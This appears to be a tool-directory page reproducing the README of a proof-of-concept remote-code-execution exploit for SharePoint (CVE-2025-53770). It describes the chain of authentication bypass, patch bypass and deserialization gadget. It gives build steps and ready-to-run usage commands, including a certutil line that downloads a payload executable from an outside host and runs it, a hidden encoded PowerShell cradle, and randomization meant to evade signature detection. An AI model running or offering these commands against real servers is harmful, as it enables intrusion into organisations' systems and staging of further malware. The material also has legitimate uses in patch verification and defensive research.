Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
OurSharePoint-CVE-2025-53770 — Do you really think SharePoint is safe? | Kitploit
Tools/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
rabbitbong/oursharepoint-cve-2025-53770

OurSharePoint-CVE-2025-53770

Do you really think SharePoint is safe?

View Repository
2147 months agoNot yet reviewed
Share

OurSharePoint — CVE-2025-53770 PoC

Self-contained, single-binary SharePoint RCE tool. Generates a TypeConfuseDelegate gadget chain as raw MS-NRBF bytes (no ysoserial.exe), wraps it in a DataSet deserialization payload, and delivers it over HTTP using the authentication bypass — all in one shot.


Exploit Chain

StepCVEDescription
1CVE-2025-49706Auth bypass — Referer: /_layouts/SignOut.aspx skips SharePoint authentication
2CVE-2025-53771Patch bypass — trailing path segment after ToolPane.aspx evades July 2025 fix
3CVE-2025-49704Deserialization — ExcelDataSet.CompressedDataTable triggers BinaryFormatter on a crafted DataSet
4—DataSet schema forces LosFormatter.Deserialize() on inner payload via ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — SortedSet<string> comparer is Process.Start(string, string), executing cmd /c <command>

The entire binary stream (both the outer DataSet wrapper and the inner TypeConfuseDelegate gadget) is constructed as raw MS-NRBF records — no .NET runtime serialization is used. This matches the format produced by the Metasploit module byte-for-byte.


Build

Requires .NET Framework 4.8 SDK (Visual Studio 2022 or standalone Build Tools):

& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Output: OurSharePoint\bin\Release\OurSharePoint.exe (single file, no dependencies)


Usage

One-shot: stage and execute

OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Simple command execution

OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

PowerShell cradle

OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Recon only (no payload)

OurSharePoint.exe --target=https://sp.corp.com --check

Build payload files offline

OurSharePoint.exe --cmd="calc.exe" --out=exploit

With proxy (Burp)

OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Legacy: external ysoserial.exe payload

ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Options

FlagDescriptionDefault
--cmd=COMMANDCommand to execute (runs as cmd /c COMMAND)—
--in=FILEPre-built base64 LosFormatter payload file—
--target=URLSharePoint base URL for HTTP delivery—
--checkFingerprint version only, no payload—
--out=PREFIXOutput file prefixpayload
--sp-version=VERLayouts path version (15 or 16)15
--proxy=URLHTTP proxy—
--ua=STRINGCustom User-AgentFirefox 120
--referer=URLOverride auth-bypass Refererauto
--timeout=SECHTTP timeout15
--a/b/c=NAMEDataSet/element/column namesrandom

Output Files

When --out is used, the tool writes:

FileContents
<prefix>.binRaw BinaryFormatter DataSet stream
<prefix>.b64GZip + Base64 encoded (what goes into CompressedDataTable)

Affected Versions

EditionVulnerable Range
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Implementation Notes

  • No runtime serialization — Both the DataSet wrapper and TypeConfuseDelegate gadget are written as raw MS-NRBF binary records using BinaryWriter. This avoids differences between .NET runtime serialization output and what the target deserializer expects.
  • LosFormatter framing — The inner gadget is wrapped with ObjectStateFormatter header bytes (0xFF 0x01 0x32 + 7-bit length) instead of using LosFormatter.Serialize().
  • Single binary — No external tools, DLLs, or Python scripts required. The .exe is fully self-contained.
  • Randomization — XML tag prefixes and DataSet element names are randomized per execution to avoid signature detection.

References

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
Download Tool